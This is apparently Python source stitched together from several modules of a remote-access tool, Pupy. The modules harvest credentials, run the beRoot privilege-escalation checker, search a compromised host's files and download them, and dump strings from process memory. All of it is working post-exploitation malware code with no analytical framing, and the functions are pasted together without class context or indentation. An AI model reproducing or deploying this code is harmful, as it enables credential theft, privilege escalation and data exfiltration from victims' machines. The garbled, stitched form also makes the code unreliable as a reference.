def run(self, args):
config = self.client.pupsrv.config
self.db = Credentials(client=self.client, config=self.config)
self.rep = os.path.join(config.get_folder('creds'), self.client.short_name())
try:
os.makedirs(self.rep)
except Exception:
pass
if self.client.is_windows():
self.windows()
elif self.client.is_linux():
self.linux()
elif self.client.is_darwin():
self.darwin()
def run(self, args):
filepath = None
if args.write:
config = self.client.pupsrv.config or PupyConfig()
folder = config.get_folder('beroot', {'%c': self.client.short_name()})
filepath = path.join(folder, str(datetime.datetime.now()).replace(" ","_").replace(":","-")+"-beroot.txt")
with redirected_stdio(self):
try:
for r in self.client.conn.modules["beRoot"].run(args.cmd, args.list, args.write):
self.print_output(output=r, write=args.write, file=filepath)
except Exception as e:
print e
if args.write:
self.success(filepath)
def run(self, args):
if args.download:
args.no_content = True
search = self.client.remote('pupyutils.search')
newer = None
older = None
if args.timestamp_newer:
try:
newer = datetime.fromtimestamp(int(args.timestamp_newer))
except ValueError:
newer = dateparser.parse(args.timestamp_newer)
newer = int((newer - datetime.fromtimestamp(0)).total_seconds())
if args.timestamp_older:
try:
older = datetime.fromtimestamp(int(args.timestamp_older))
except ValueError:
older = dateparser.parse(args.timestamp_older)
older = int((older - datetime.fromtimestamp(0)).total_seconds())
s = search.Search(
args.filename,
strings=args.strings,
max_size=args.max_size,
root_path=args.path,
follow_symlinks=args.links,
no_content=args.no_content,
case=args.insensitive,
binary=args.binary,
same_fs=not args.no_same_fs,
search_in_archives=args.archive,
content_only=args.content_only,
suid=args.suid,
sgid=args.sgid,
user=args.user,
group=args.group,
owaw=args.own_world_accessible_write,
newer=newer,
older=older,
xattr=args.xattr if args.xattr else args.xattr is not False)
if args.download:
config = self.client.pupsrv.config
download_folder = config.get_folder(
'searches', {'%c': self.client.short_name()})
downloader = DownloadFronted(self.client,
honor_single_file_root=True,
verbose=self.info,
error=self.error)
on_data, on_completed = downloader.create_download_callback(
download_folder)
def on_completed_info():
self.success('Search completed, finish download engine')
on_completed()
self.terminate = downloader.interrupt
self.info('Search+Download started. Use ^C to interrupt')
s.run_cbs(on_data, on_completed_info, self.error)
downloader.process()
self.success('Search+Download completed')
else:
terminate = Event()
def on_data(res):
if terminate.is_set():
return
if type(res) == tuple:
f, v = res
self.success(u'{}: {}'.format(f, v))
else:
self.success(res)
def on_completed():
terminate.set()
self.info('complete')
self.terminate = terminate.set
self.info('Search started. Use ^C to interrupt')
error = self.error
if not args.verbose:
def error(x):
pass
s.run_cb(on_data, on_completed, error)
terminate.wait()
s.stop()
def run(self, args):
targets = args.pid + args.name
REvent = self.client.remote('threading', 'Event', False)
iterate_strings = self.client.remote('memstrings', 'iterate_strings',
False)
self.termevent = REvent()
last_pid = None
last_log = None
config = self.client.pupsrv.config
for pid, name, strings in iterate_strings(
targets,
args.regex,
min_length=args.min_length,
max_length=args.max_length,
omit=args.omit,
portions=args.portions,
terminate=self.termevent,
nodup=args.no_duplication,
):
strings = obtain(strings)
pid = str(pid) or '0'
name = str(name) or ''
if not strings:
self.error('No dumps received')
return
if args.stdout:
self.success('Strings {}:{}'.format(name, pid))
for s in strings:
self.log(s)
else:
if last_pid != pid:
last_pid = pid
if last_log:
last_log.close()
try:
folder = config.get_folder(
'memstrings', {'%c': self.client.short_name()})
path = name.replace('!', '!!').replace('/',
'!').replace(
'\\', '!')
path = os.path.join(folder,
'{}.{}.strings'.format(path, pid))
last_log = open(path, 'w+')
self.success('{} {} -> {}'.format(name, pid, path))
except Exception as e:
self.error('{} {}: {}'.format(name, pid, e))
for s in strings:
last_log.write(s + '\n')
last_log.flush()
if last_log:
last_log.close()
def run(self, args):
if args.download:
args.no_content = True
search = self.client.remote('pupyutils.search')
s = search.Search(
args.filename,
strings=args.strings,
max_size=args.max_size,
root_path=args.path,
follow_symlinks=args.links,
no_content=args.no_content,
case=args.insensitive,
binary=args.binary,
)
if args.download:
config = self.client.pupsrv.config
download_folder = config.get_folder(
'searches', {'%c': self.client.short_name()})
downloader = DownloadFronted(self.client,
honor_single_file_root=True,
verbose=self.info,
error=self.error)
on_data, on_completed = downloader.create_download_callback(
download_folder)
self.terminate = downloader.interrupt
self.info('Search+Download started. Use ^C to interrupt')
s.run_cbs(on_data, on_completed, self.error)
downloader.process()
self.info('complete')
else:
terminate = Event()
def on_data(res):
if terminate.is_set():
return
if args.strings and not args.no_content:
if type(res) == tuple:
f, v = res
if type(f) == unicode:
f = f.encode('utf-8')
if type(v) == unicode:
v = v.encode('utf-8')
self.success('{}: {}'.format(f, v))
elif not args.content_only:
self.success(res)
else:
self.success(res)
def on_completed():
terminate.set()
self.info('complete')
self.terminate = terminate.set
self.info('Search started. Use ^C to interrupt')
s.run_cb(on_data, on_completed, self.error)
terminate.wait()
s.stop()